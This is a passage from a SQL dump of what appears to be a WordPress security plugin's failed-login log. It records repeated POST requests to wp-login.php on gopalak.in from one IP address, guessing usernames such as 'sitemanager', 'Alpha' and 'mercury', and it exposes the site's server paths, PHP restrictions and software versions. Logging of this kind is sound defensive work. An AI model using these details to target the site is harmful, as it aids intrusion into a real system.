ONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984812.519985;s:12:\"REQUEST_TIME\";i:1746984812;}}','13.233.245.36',1,'2025-05-11 23:03:34','2025-05-12 23:29:05'),(95564,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984812.509032;s:12:\"REQUEST_TIME\";i:1746984812;}}','13.233.245.36',1,'2025-05-11 23:03:34','2025-05-12 23:29:05'),(95565,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984812.4975441;s:12:\"REQUEST_TIME\";i:1746984812;}}','13.233.245.36',1,'2025-05-11 23:03:34','2025-05-12 23:29:05'),(95566,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985195.473115;s:12:\"REQUEST_TIME\";i:1746985195;}}','13.233.245.36',1,'2025-05-11 23:09:57','2025-05-12 23:29:05'),(95567,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985195.4926879;s:12:\"REQUEST_TIME\";i:1746985195;}}','13.233.245.36',1,'2025-05-11 23:09:57','2025-05-12 23:29:05'),(95568,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985195.481143;s:12:\"REQUEST_TIME\";i:1746985195;}}','13.233.245.36',1,'2025-05-11 23:09:57','2025-05-12 23:29:05'),(95569,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985195.4785841;s:12:\"REQUEST_TIME\";i:1746985195;}}','13.233.245.36',1,'2025-05-11 23:09:57','2025-05-12 23:29:05'),(95570,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985195.4758019;s:12:\"REQUEST_TIME\";i:1746985195;}}','13.233.245.36',1,'2025-05-11 23:09:57','2025-05-12 23:29:05'),(95571,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985580.052475;s:12:\"REQUEST_TIME\";i:1746985580;}}','13.233.245.36',1,'2025-05-11 23:16:21','2025-05-12 23:29:05'),(95572,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985580.0516679;s:12:\"REQUEST_TIME\";i:1746985580;}}','13.233.245.36',1,'2025-05-11 23:16:21','2025-05-12 23:29:05'),(95573,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746985580.0534079;s:12:\"REQUEST_TIME\";i:1746985580;}}','13.233.245.36',1,'2025-05-11 23:16:21','2025-05-12 23:29:05'),(95574,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\